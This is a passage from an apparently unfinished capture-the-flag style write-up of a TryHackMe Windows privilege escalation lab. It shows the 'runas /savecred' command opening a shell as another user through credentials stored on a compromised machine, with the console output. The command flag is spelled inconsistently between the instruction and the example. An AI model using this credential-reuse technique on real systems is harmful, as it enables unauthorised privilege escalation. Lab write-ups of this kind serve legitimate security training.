JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/(Unfinished) Windows Privilege Escalation.md

     User: WPRIVESC1\mike.katz
 ```

+3. `runas /savedcred /user:<USER> <COMMAND>` from our compromised Windows machine to run a command and open up a terminal as the user that we just previously discovered using their credentials that are already stored on the local system
 ```PowerShell
 C:\Users\thm-unpriv>runas /savecred /user:mike.katz cmd.exe
 Attempting to start cmd.exe as user "WPRIVESC1\mike.katz" ...
 ```
 ```PowerShell
 Microsoft Windows [Version 10.0.17763.1821]
 (c) 2018 Microsoft Corporation.
 All rights reserved.